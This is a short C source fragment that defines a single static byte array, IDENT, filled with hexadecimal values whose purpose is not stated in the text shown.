static char IDENT[] = {
    0x60,0xb4,0x10,0x7d,0x33,0x41,0xf7,0x10,
    0xf1,0x7d,0xe0,0x70,0x41,0x24,0xfb,0xd0,
    0x40,0xd2,0x43,0xd3,0x72,0x7d,0x54,0xfa,
    0x30,0xd1,0x71,0xa4,0x10,0x71,0x41,0xfb,
    0x12,0x21,0x41,0x22,0xf1,0x41,0xd0,0x41,
    0xd1,0x7d,0x3b,0x26,0xc0,0x7d,0x3b,0x49,
    0xf9,0xa7,0x21,0x44,0x7d,0x3b,0xf9,0xa1,
    0x41,0x24,0xfb,0xc0,0xd7,0x40,0xd5,0x24,
    0xf2,0x2b,0x2b,0x88,0xd8,0x25,0x25,0x25,
    0x25,0x25,0x25,0x25,0x45,0xd9,0x65,0x2a,
    0x2a,0x2a,0x2a,0x2a,0x2a,0x4a,0xda,0x79,
    0x78,0xe0,0x78,0x30,0x79,0xf4,0xc0,0xaa,
    0x7a,0x78,0xe0,0x78,0x30,0x7a,0xf4,0xc0,
    0xa1,0x02,0x41,0xd5,0x41,0xd6,0x40,0xd2,
    0x43,0xd3,0x72,0x7d,0x54,0xfa,0x30,0xd1,
    0x71,0x21,0xa9,0x71,0x21,0x40,0x25,0xf2,
    0xd1,0x18,0x71,0x4c,0xf7,0x75,0x78,0x25,
    0xf2,0xd5,0x76,0x79,0x25,0xf2,0xd6,0x77,
    0x7a,0x24,0xfb,0xd7,0x12,0x22,0x47,0x22,
    0xf1,0x7d,0x33,0x21,0x40,0xf4,0xd4,0x15,
    0x74,0x4c,0xfb,0xbc,0x22,0xf0,0x00,0x00
};

